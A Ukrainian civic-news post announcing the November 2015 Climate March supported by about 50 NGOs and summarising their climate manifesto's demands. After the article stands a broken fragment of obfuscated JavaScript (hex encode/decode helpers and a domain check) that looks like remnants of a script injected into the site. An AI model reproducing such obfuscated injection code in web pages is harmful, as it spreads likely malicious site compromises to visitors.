Кліматичний Марш підтримали близько 50 громадських організацій

29 листопада 2015 року українці разом з іншими активними громадянами світу вийдуть на вулиці своїх міст закликати владу впроваджувати заходи, спрямовані на боротьбу зі зміною клімату. Акція ...

Додано:
karafolia

climate march – копія
Кліматичний Марш підтримали близько 50 громадських організацій

29 листопада 2015 року українці разом з іншими активними громадянами світу вийдуть на вулиці своїх міст закликати владу впроваджувати заходи, спрямовані на боротьбу зі зміною клімату.

Акція відбудеться напередодні Кліматичної Конференції ООН у Парижі, на якій уряди 198 країн, включаючи Україну, спробують підписати нову міжнародну угоду по клімату, яка замінить Кіотський протокол.

Близько 50 неурядових громадських організацій зі всієї України, серед яких Національний екологічний центр України, Громадянська мережа ОПОРА, Всесвітній фонд природи WWF, «Зробимо Україну чистою», Асоціація велосипедистів Києва, «Мегамарш» та ін., підписали «Кліматичний маніфест», у якому сформулювали основні вимоги акції: утеплювати будинки, розвивати громадський транспорт і велосипедну інфраструктуру, переходити до відновлюваних джерел енергії, реформувати сектор енергетики, запроваджувати роздільний збір та переробку сміття, зобов’язати підприємства привести викиди забруднюючих речовин до європейських норм.

Провідні вчені б’ють на сполох: якщо людство не стане на шлях низьковуглецевого розвитку, то середня температура на Землі підвищиться на 4-5°С. Це спричинить низку незворотних наслідків, що загрожуватимуть всьому живому на Землі – посухи та сильні вітри, нестача питної води, зменшення врожаю, повені, вимирання видів, надмірні опади і підвищення рівня світового океану. За 20 років активної роботи проти зміни клімату було чимало зроблено, проте цих зусиль не вистачає. Цілі, які перед собою ставлять політики, в тому числі й українські, не є амбіційними й не зупиняють підвищення температури.

Тому активісти запрошують усіх небайдужих долучитися до Глобального Кліматичного Маршу та продемонструвати потужний голос громадянського суспільства на захист клімату та безпечного майбутнього. Про подробиці акції у Києві та інших містах дізнавайтеся тут. Із текстом Маніфесту та списком організацій, що його підтримали, можна ознайомитися тут.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "prostir.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e


Тематика публікації:              

Останні публікації цього розділу:

Молодь з 30 громад напрацювала стратегії розвитку молодіжних рад під час літнього табору в Карпатах

Дуже просторова добірка вакансій в громадському секторі

Чотири роки партнерства: історія співпраці громадської організації «Нова Дружківка» та Дружківської пожежно-рятувальної частини

39 ветеранів/ок завершили навчання на сертифікатній програмі “Урядування в умовах воєнного стану та післявоєнного відновлення"

Громадська участь у місцевій політиці: які зміни до статутів громад мають внести сільські та селищні ради Харківщини

«Ми змогли відірвати дітей від гаджетів». Як у Вишнівській громаді реалізували шкільний бюджет